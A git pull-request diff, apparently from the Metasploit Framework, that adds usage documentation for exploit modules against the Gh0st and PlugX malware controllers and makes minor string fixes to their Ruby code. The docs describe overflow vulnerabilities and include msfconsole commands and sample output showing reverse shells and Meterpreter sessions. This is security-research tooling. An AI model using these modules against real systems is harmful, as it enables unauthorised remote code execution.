Merge pull request #1 from h00die/updates

Modules cleanup and add docs

Author: Professor-plum

documentation/modules/exploit/windows/misc/gh0st.md

@@ -0,0 +1,42 @@
+## Vulnerable Application
+
+  This module exploits a buffer overflow in the Gh0st Controller when handling a drive list as received by a victim.
+  This vulnerability can allow remote code execution in the context of the user who ran it.
+  
+  A vulnerable version of the software is available here: [gh0st 3.6](https://github.com/rapid7/metasploit-framework/files/1243297/0efd83a87d2f5359fae051517fdf4eed8972883507fbd3b5145c3757f085d14c.zip)
+
+## Verification Steps
+
+  1. Run the application
+  2. Start msfconsole
+  3. Do: `use exploit/windows/misc/gh0st`
+  4. Do: `set rhost [ip]`
+  5. Do: `exploit`
+  6. Get a shell
+
+## Options
+
+  **MAGIC**
+  
+  This is the 5 character magic used by the server.  The default is `Gh0st`
+
+## Scenarios
+
+### Windows XP SP3 with gh0st 3.6
+
+```
+msf > use exploit/windows/misc/gh0st 
+msf exploit(gh0st) > set rhost 192.168.2.108
+rhost => 192.168.2.108
+msf exploit(gh0st) > exploit
+
+[*] Started reverse TCP handler on 1.2.3.4:4444 
+[*] 1.2.3.1:80 - Trying target Gh0st Beta 3.6
+[*] 1.2.3.1.108:80 - Spraying heap...
+[*] 1.2.3.1:80 - Trying command 103...
+[*] Sending stage (956991 bytes) to 1.2.3.1
+[*] Meterpreter session 1 opened (1.2.3.4:4444 -> 1.2.3.1:1303) at 2017-08-26 16:53:58 -0400
+[*] 1.2.3.1:80 - Server closed connection
+
+meterpreter >
+```

documentation/modules/exploit/windows/misc/plugx.md

@@ -0,0 +1,42 @@
+## Vulnerable Application
+
+  This module exploits a stack overflow in the Plug-X Controller when handling a larger than expected message.
+  This vulnerability can allow remote code execution however it causes a popup message to be displayed on the target before execution is gained.
+  
+  A vulnerable version of the software is available here: [PlugX type 1](https://github.com/rapid7/metasploit-framework/files/1243293/9f59a606c57217d98a5eea6846c8113aca07b203e0dcf17877b34a8b2308ade6.zip)
+
+## Verification
+
+  1. Run the application
+  2. Start msfconsole
+  3. Do: `use exploit/windows/misc/plugx`
+  4. Do: `set rhost [ip]`
+  5. Do: `set target [target]`
+  6. Do: `exploit`
+  7. Click OK for the "PeDecodePacket" pop-up on the target
+  8. Get a shell
+
+## Scenarios
+
+### Windows XP SP3 with PlugX type 1
+
+```
+msf > use exploit/windows/misc/plugx 
+msf exploit(plugx) > set rhost 1.2.3.4
+rhost => 1.2.3.4
+msf exploit(plugx) > set target 1
+target => 1
+msf exploit(plugx) > set verbose true
+verbose => true
+msf exploit(plugx) > exploit
+
+[*] Started reverse TCP handler on 1.2.3.99:4444 
+[*] 1.2.3.4:13579 - Trying target PlugX Type I...
+[*] 1.2.3.4:13579 - waiting for response
+[*] Sending stage (956991 bytes) to 1.2.3.4
+[*] Meterpreter session 1 opened (1.2.3.99:4444 -> 1.2.3.4:1975) at 2017-09-04 19:53:07 -0400
+[*] 1.2.3.4:13579 - Server closed connection
+
+meterpreter > getuid
+Server username: WINXP\user
+```

modules/exploits/windows/misc/gh0st.rb

@@ -42,7 +42,7 @@ def initialize(info = {})
 
     register_options(
       [
-        OptString.new('MAGIC', [true, 'the 5 char magic used by the server', 'Gh0st']),
+        OptString.new('MAGIC', [true, 'The 5 char magic used by the server', 'Gh0st']),
         Opt::RPORT(80)
       ]
     )
@@ -82,7 +82,6 @@ def validate_response(data)
       print_status('Packet decompress failure')
       return false
     end
-    # print_status(msg.ord.to_s)
     return true
   end
 

modules/exploits/windows/misc/plugx.rb

@@ -162,7 +162,7 @@ def exploit
     connect
     sock.put(pkt)
 
-    print_status('waiting for response')
+    print_status('Waiting for response')
     validate_response(sock.get_once)
     disconnect